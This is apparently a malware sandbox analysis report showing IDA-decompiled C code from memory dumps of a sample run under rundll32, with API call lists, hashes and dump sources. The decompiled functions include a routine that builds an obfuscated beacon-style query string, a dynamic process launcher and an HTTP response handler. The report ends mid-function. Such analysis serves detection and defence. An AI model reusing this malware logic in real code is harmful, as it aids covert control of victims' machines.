					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00402450(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004024AB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00402547(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                0x00402348
                0x00402349
                0x0040234a
                0x0040234d
                0x0040234f
                0x00402352
                0x00402353
                0x00402355
                0x00402356
                0x00402357
                0x0040235a
                0x00402364
                0x00402415
                0x0040241c
                0x00402425
                0x0040236a
                0x0040236a
                0x00402370
                0x00402376
                0x00402379
                0x0040237c
                0x00402380
                0x00402385
                0x0040238a
                0x0040240a
                0x00000000
                0x0040238c
                0x0040238c
                0x00402398
                0x0040239a
                0x004023f5
                0x004023f5
                0x004023fb
                0x00000000
                0x0040239c
                0x004023ab
                0x004023ad
                0x004023ae
                0x004023af
                0x004023b2
                0x004023b2
                0x004023b4
                0x00000000
                0x004023b6
                0x004023b6
                0x00402400
                0x004023b8
                0x004023b8
                0x004023bc
                0x004023c4
                0x004023c9
                0x004023ce
                0x004023da
                0x004023e2
                0x004023e9
                0x004023ef
                0x004023f3
                0x00000000
                0x004023f3
                0x004023b6
                0x004023b4
                0x00000000
                0x0040239a
                0x0040240e
                0x0040240e
                0x0040240e
                0x0040238a
                0x0040242a
                0x00402431

                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction ID: b479ffddf21c4ea789bd4d07820d51ba5b50ca91345b5b8c0003f012d5d4788e
                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction Fuzzy Hash: 5B21C432900204ABCB14EF69C9C89A7B7A5FF48354B45807AEC15AB2C6DB74F915C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B983CC Relevance: .1, Instructions: 77COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 71%
                			E04B983CC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04B98537(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04B985F1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04B984DC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04B98537(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04B985D3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                0x04b983d0
                0x04b983d1
                0x04b983d2
                0x04b983d5
                0x04b983d7
                0x04b983da
                0x04b983db
                0x04b983dd
                0x04b983de
                0x04b983df
                0x04b983e2
                0x04b983ec
                0x04b9849d
                0x04b984a4
                0x04b984ad
                0x04b983f2
                0x04b983f2
                0x04b983f8
                0x04b983fe
                0x04b98401
                0x04b98404
                0x04b98408
                0x04b9840d
                0x04b98412
                0x04b98492
                0x00000000
                0x04b98414
                0x04b98414
                0x04b98420
                0x04b98422
                0x04b9847d
                0x04b9847d
                0x04b98483
                0x00000000
                0x04b98424
                0x04b98433
                0x04b98435
                0x04b98436
                0x04b98437
                0x04b9843a
                0x04b9843a
                0x04b9843c
                0x00000000
                0x04b9843e
                0x04b9843e
                0x04b98488
                0x04b98440
                0x04b98440
                0x04b98444
                0x04b9844c
                0x04b98451
                0x04b98456
                0x04b98462
                0x04b9846a
                0x04b98471
                0x04b98477
                0x04b9847b
                0x00000000
                0x04b9847b
                0x04b9843e
                0x04b9843c
                0x00000000
                0x04b98422
                0x04b98496
                0x04b98496
                0x04b98496
                0x04b98412
                0x04b984b2
                0x04b984b9

                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: d9ce20ecb6a8aa3fb582a894a034a446d6d29b13a3e52508439d41391f165d04
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: CE2190329102049FDF10EF68C8809ABBBE5FF46360B4A81B8D9559B245EB30FD15CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B911DD Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 278memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E04B911DD(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x4b9a018; // 0x2e793154
				asm("bswap eax");
				_t70 =  *0x4b9a014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x4b9a010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x4b9a00c; // 0x13d015ef
				asm("bswap eax");
				_t73 =  *0x4b9a348; // 0x56d5a8
				_t3 = _t73 + 0x4b9b62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18a, _t72, _t71, _t70, _t69,  *0x4b9a02c,  *0x4b9a004, _t68);
				_t76 = E04B967F4();
				_t77 =  *0x4b9a348; // 0x56d5a8
				_t4 = _t77 + 0x4b9b66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x4b9a348; // 0x56d5a8
					_t8 = _t148 + 0x4b9b676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x4b9a348; // 0x56d5a8
				_t10 = _t81 + 0x4b9b78e; // 0x5108d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x4b9b2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x4b9a36c; // 0x51095b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x4b9a348; // 0x56d5a8
					_t16 = _t144 + 0x4b9b889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E04B924C5(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x4b9a348; // 0x56d5a8
					_t19 = _t139 + 0x4b9b8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x4b9a2d8, 0, _a40);
				}
				_t87 = E04B96173();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x4b9a348; // 0x56d5a8
					_t23 = _t135 + 0x4b9b8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x4b9a2d8, 0, _a40);
				}
				_t166 =  *0x4b9a3cc; // 0x5109600
				_t89 = E04B96107(0x4b9a00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x4b9a2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x4b9a2d8, _t172, _a8);
						goto L30;
					}
					E04B952F6(GetTickCount());
					_t96 =  *0x4b9a3cc; // 0x5109600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x4b9a3cc; // 0x5109600
					__imp__(_t100 + 0x40);
					_t102 =  *0x4b9a3cc; // 0x5109600
					_t168 = E04B95D8A(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x4b9a2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x4b99294);
					_push(_t168);
					_t108 = E04B927B3();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x4b9a2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E04B92EAF( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E04B9554C();
						L26:
						HeapFree( *0x4b9a2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E04B95B38(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E04B97262(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E04B94130(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E04B95366(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E04B94130(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}






























































                0x04b911dd
                0x04b911dd
                0x04b911e1
                0x04b911e8
                0x04b911f2
                0x04b911f4
                0x04b911f4
                0x04b91201
                0x04b9120c
                0x04b9120f
                0x04b9121a
                0x04b9121d
                0x04b91222
                0x04b91225
                0x04b9122a
                0x04b9122d
                0x04b91239
                0x04b91246
                0x04b91248
                0x04b9124e
                0x04b91253
                0x04b9125e
                0x04b91260
                0x04b91263
                0x04b9126a
                0x04b9126c
                0x04b91275
                0x04b91280
                0x04b91282
                0x04b91285
                0x04b91285
                0x04b91287
                0x04b9128c
                0x04b9128c
                0x04b91294
                0x04b91298
                0x04b9129e
                0x04b912a9
                0x04b912ab
                0x04b912b0
                0x04b912b5
                0x04b912b8
                0x04b912bd
                0x04b912c8
                0x04b912ca
                0x04b912cd
                0x04b912cd
                0x04b912cf
                0x04b912da
                0x04b912e0
                0x04b912e3
                0x04b912e8
                0x04b912f3
                0x04b912f5
                0x04b912fc
                0x04b91306
                0x04b91306
                0x04b91308
                0x04b9130d
                0x04b91313
                0x04b91316
                0x04b9131b
                0x04b91325
                0x04b91327
                0x04b91336
                0x04b91336
                0x04b91338
                0x04b91346
                0x04b9134b
                0x04b9134d
                0x04b91353
                0x04b91533
                0x04b9153b
                0x04b91548
                0x04b91359
                0x04b91365
                0x04b9136b
                0x04b91371
                0x04b91526
                0x04b91531
                0x00000000
                0x04b91531
                0x04b9137d
                0x04b91382
                0x04b9138b
                0x04b9139c
                0x04b913a0
                0x04b913a9
                0x04b913af
                0x04b913bc
                0x04b913c9
                0x04b913cf
                0x04b91519
                0x04b91524
                0x00000000
                0x04b91524
                0x04b913db
                0x04b913e1
                0x04b913e2
                0x04b913e7
                0x04b913ed
                0x04b9150f
                0x04b91517
                0x00000000
                0x04b91517
                0x04b913f7
                0x04b913fe
                0x04b91408
                0x04b9140e
                0x04b91418
                0x04b9142a
                0x04b9142c
                0x04b91432
                0x04b9154b
                0x04b914fa
                0x04b914fa
                0x04b914ff
                0x04b9150b
                0x04b9150d
                0x00000000
                0x04b9150d
                0x04b9143d
                0x04b91442
                0x04b91448
                0x04b91453
                0x04b9145e
                0x04b91462
                0x04b91468
                0x04b9146e
                0x04b91474
                0x04b91477
                0x04b9147d
                0x04b91480
                0x04b91485
                0x04b91489
                0x04b91489
                0x04b91496
                0x04b914a4
                0x04b914a9
                0x04b914ab
                0x04b914b1
                0x04b914b7
                0x04b914b9
                0x04b914be
                0x04b914c2
                0x04b914de
                0x04b914de
                0x04b914b1
                0x00000000
                0x04b91498
                0x04b9149d
                0x04b914e0
                0x04b914e4
                0x04b914ee
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x04b914ee
                0x04b9149f
                0x00000000
                0x04b9149f
                0x04b91496

                APIs
                • GetTickCount.KERNEL32 ref: 04B911F4
                • wsprintfA.USER32 ref: 04B91241
                • wsprintfA.USER32 ref: 04B9125E
                • wsprintfA.USER32 ref: 04B91280
                • wsprintfA.USER32 ref: 04B912A7
                • wsprintfA.USER32 ref: 04B912C8
                • wsprintfA.USER32 ref: 04B912F3
                • HeapFree.KERNEL32(00000000,?), ref: 04B91306
                • wsprintfA.USER32 ref: 04B91325
                • HeapFree.KERNEL32(00000000,?), ref: 04B91336
                  • Part of subcall function 04B96107: RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B96123
                  • Part of subcall function 04B96107: RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B96141
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B91365
                • GetTickCount.KERNEL32 ref: 04B91377
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B9138B
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B913A9
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B95D8A: strcpy.NTDLL ref: 04B95DD4
                  • Part of subcall function 04B95D8A: lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95D8A: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                • StrTrimA.SHLWAPI(00000000,04B99294,?,05109600), ref: 04B913DB
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B927B3: lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                  • Part of subcall function 04B927B3: lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                • lstrcpy.KERNEL32(00000000,?), ref: 04B913FE
                • lstrcpy.KERNEL32(?,?), ref: 04B91408
                • lstrcat.KERNEL32(?,?), ref: 04B91418
                • lstrcat.KERNEL32(?,00000000), ref: 04B9141F
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                • wcstombs.NTDLL ref: 04B914C2
                  • Part of subcall function 04B97262: SysAllocString.OLEAUT32(?), ref: 04B9729D
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • HeapFree.KERNEL32(00000000,?), ref: 04B9150B
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B91517
                • HeapFree.KERNEL32(00000000,?,?,05109600), ref: 04B91524
                • HeapFree.KERNEL32(00000000,?), ref: 04B91531
                • HeapFree.KERNEL32(00000000,?), ref: 04B9153B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                • String ID: Uet$T1y.
                • API String ID: 1185349883-1202656988
                • Opcode ID: e90b184a201ddd3e8fcaaae880b14053a4e69d6c28844f1b8c0ec6c25a682f28
                • Instruction ID: a32d703ea9655c95829a2a0b8cc0bc5dfa25c0b4ced9a83d99b8a0071b76d741
                • Opcode Fuzzy Hash: e90b184a201ddd3e8fcaaae880b14053a4e69d6c28844f1b8c0ec6c25a682f28
                • Instruction Fuzzy Hash: F7A1BA71504214AFDB11EF68DD84E5A7BE8EF8C354F05096AF848D3220CB39ED04DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9708B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E04B9708B(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04B97422(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04B97B55( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4b9a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4b9a348; // 0x56d5a8
					_t18 = _t47 + 0x4b9b3f3; // 0x73797325
					_t68 = E04B91F14(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4b9a348; // 0x56d5a8
						_t19 = _t50 + 0x4b9b73f; // 0x5108ce7
						_t20 = _t50 + 0x4b9b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04B92496();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04B92496();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4b9a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04B94130(_t70);
				goto L12;
			}


















                0x04b97093
                0x04b97093
                0x04b970a2
                0x04b970a9
                0x04b970ae
                0x04b971bb
                0x04b971c2
                0x04b971c2
                0x04b970bd
                0x04b970c5
                0x04b970c8
                0x04b970cd
                0x04b970e2
                0x04b970e8
                0x04b970e9
                0x04b970ec
                0x04b970f2
                0x04b970f5
                0x04b970fa
                0x04b97102
                0x04b9710e
                0x04b97112
                0x04b971a2
                0x04b97118
                0x04b97118
                0x04b9711d
                0x04b97124
                0x04b97138
                0x04b9713c
                0x04b9718b
                0x04b9713e
                0x04b9713f
                0x04b97146
                0x04b9715f
                0x04b97161
                0x04b97165
                0x04b9716c
                0x04b97186
                0x04b9716e
                0x04b97177
                0x04b9717c
                0x04b9717c
                0x04b9716c
                0x04b9719a
                0x04b9719a
                0x04b97112
                0x04b971a9
                0x04b971b2
                0x04b971b6
                0x00000000

                APIs
                  • Part of subcall function 04B97422: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B970A7,?,?,?,?,00000000,00000000), ref: 04B97447
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B97469
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B9747F
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B97495
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B974AB
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B974C1
                • memset.NTDLL ref: 04B970F5
                  • Part of subcall function 04B91F14: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04B9710E,73797325), ref: 04B91F25
                  • Part of subcall function 04B91F14: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B91F3F
                • GetModuleHandleA.KERNEL32(4E52454B,05108CE7,73797325), ref: 04B9712B
                • GetProcAddress.KERNEL32(00000000), ref: 04B97132
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B9719A
                  • Part of subcall function 04B92496: GetProcAddress.KERNEL32(36776F57,04B9591A), ref: 04B924B1
                • CloseHandle.KERNEL32(00000000,00000001), ref: 04B97177
                • CloseHandle.KERNEL32(?), ref: 04B9717C
                • GetLastError.KERNEL32(00000001), ref: 04B97180
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Uet$@MetNet
                • API String ID: 3075724336-1616585941
                • Opcode ID: d2a68d9c113fe695e8aacc887e8ef02188358f4556aebaa535ae5b4ad806855c
                • Instruction ID: 5753c8a2a9df6d2f6013e21c157b13231d49ae5ef3cbd74ca5f1e39a1e7dc498
                • Opcode Fuzzy Hash: d2a68d9c113fe695e8aacc887e8ef02188358f4556aebaa535ae5b4ad806855c
                • Instruction Fuzzy Hash: AE311FB6900219FFEF10AFA4DD88E9EBBFCEB08344F1145B9E605A7111DB34AD558B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B91555 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92networksynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B91555(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04B96601(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04B94130(_t58);
									_v12 = GetLastError();
								} else {
